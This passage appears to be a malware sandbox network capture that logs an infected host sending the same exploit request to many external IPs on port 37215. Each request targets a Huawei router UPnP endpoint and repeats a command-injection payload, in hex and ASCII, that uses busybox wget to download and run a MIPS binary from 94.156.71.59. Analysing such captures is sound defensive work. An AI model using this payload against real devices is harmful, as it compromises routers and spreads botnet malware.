2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            736192.168.2.1354022156.142.125.12937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.706857920 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            737192.168.2.1352190156.122.95.10937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.707895994 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            738192.168.2.133370841.0.196.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.709296942 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            739192.168.2.135012841.228.119.11837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.710308075 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            740192.168.2.135687041.91.70.18937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.711502075 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            741192.168.2.1356980156.212.245.10537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.712763071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            742192.168.2.1350702156.244.102.17337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.713902950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            743192.168.2.1346712197.57.43.25337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.715141058 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            744192.168.2.1342970156.28.97.25437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.716092110 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            745192.168.2.1337456156.79.80.137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.717242956 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            746192.168.2.1351422197.19.66.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.718331099 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
